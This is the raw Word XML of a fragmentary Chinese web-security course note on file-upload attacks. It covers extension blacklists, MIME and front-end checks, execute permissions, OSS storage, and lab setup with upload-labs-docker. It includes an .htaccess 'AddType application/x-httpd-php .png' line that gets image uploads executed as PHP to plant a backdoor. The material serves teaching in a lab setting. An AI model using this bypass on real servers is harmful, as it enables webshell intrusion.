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EA4F" w14:textId="77777777" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:pBdr>
          <w:bottom w:val="triple" w:sz="2" w:space="0" w:color="FC0403"/>
        </w:pBdr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web攻防-文件上传&amp;黑白名单&amp;MIME&amp;JS泄露&amp;执行权限&amp;编码解析&amp;OSS存储&amp;分域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF697F1" w14:textId="574B8615" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">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52C2F917" wp14:editId="72DE5ABA">
            <wp:extent cx="5271770" cy="164592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1645920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="522FB7B7" w14:textId="77777777" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">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产生原理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应用因素</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各类数据库类型利用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参数格式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-XML&amp;JSON&amp;BASE64</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数字字符搜索等符号绕过</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&amp;UA&amp;Cookie</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头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;XFF&amp;Referer</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操作方法</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增删改查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布尔</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延时</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报错</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盲注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高权限用户差异</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跨库</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文件读写带外</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堆叠</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二次注入</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-SQLMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进阶使用</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分类</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反射</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存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;DOM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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文件类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-html&amp;pdf&amp;swf&amp;svg</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-postMessage&amp;localStorage</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转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-UXSS&amp;MXSS</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框架和库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-VUE&amp;React&amp;Electron&amp;JQuery</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手工代码</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框架工具</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在线平台</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>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盗取</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数据提交</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网络钓鱼</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安全防护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;CSP&amp;Httponly&amp;WAF</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-XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跨站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工具项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;XSStrike&amp;Chypass_pro</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原理</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检测</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防御</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-Referer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>策略隐患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防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>校验策略隐患</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利用绕过</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伪协议</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及域名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挖掘思路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功能逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;SRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>复盘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插件结合</w:t>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复盘与实战</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黑白名单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;MIME&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件头等</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攻防</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文件上传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执行权限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解码还原</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云存储</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分站等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OWTOP10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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注入，文件安全（上传</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下载</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读取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删除</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包含等），目录遍历，</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CSRF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CRLF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SSTI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XML&amp;XXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>安全，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>执行（代码或命令等）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>反序列化，业务逻辑（验证码，接口枚举，支付购买，机制验证，越权，并发等）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未授权访问，失效访问控制，弱口令安全，第三方组件安全，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CORS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JSONP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7C60B" w14:textId="587DF82B" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CDAD534" wp14:editId="178B5D10">
            <wp:extent cx="5271770" cy="58521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5852160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E655050" w14:textId="77777777" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">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4FC6EF5E" w14:textId="77777777" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:ind w:left="336" w:hanging="336"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻防</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文件上传</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安全验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>层面逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD9CEFA" w14:textId="77777777" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:ind w:left="336" w:hanging="336"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻防</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文件上传</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执行权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>解码还原</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E620E4" w14:textId="77777777" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:ind w:left="336" w:hanging="336"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻防</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文件上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分站存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&amp;OSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62889D06" w14:textId="77777777" w:rsidR="0012212F" w:rsidRDefault="0012212F" w:rsidP="0012212F">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常规文件上传：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="70809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课前一定要明白：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无文件解析安全问题上，格式解析是一对一的（不能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解析</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换句话来说有解析错误配置或后缀解析漏洞时才能实现格式差异解析</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lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、文件上传安全指的是攻击者通过利用上传实现后门的写入连接后门进行权限控制的安全问题，对于如何确保这类安全问题，一般会从原生态功能中的文件内容，文件后缀，文件类型等方面判断，但是漏洞可能不仅在本身的代码验证逻辑中出现安全问题，也会在语言版本，语言函数，中间件，引用的第三方编辑器等存在缺陷地方配合利用。另外文件上传也有多个存储逻辑，不同的文件存储方案也会给攻击者带来不一样的挑战！</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无限制</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>任意上传，什么文件都能上传</w:t>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有限制：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>限制后缀格式（判断后缀名（黑白名单），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型，文件头等）</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70809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测试环境安装参考：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/ffffffff0x/f8x</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/fuzzdb-project/fuzzdb</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/sqlsec/upload-labs-docker</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载上述资源</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">f8x -d </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 xml:space="preserve"> f8x -docker</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进入项目文件夹</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cd upload-labs-docker</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一键部署运行</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>docker-compose up -d</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JS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如何判断是否是前端验证呢？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先抓包监听，如果上传文件的时候还没有抓取到数据包，但是浏览器就提示文件类型不正确的话，那么这个多半就是前端校验了</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.htaccess</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AddType application/x-httpd-php .png</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MIME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
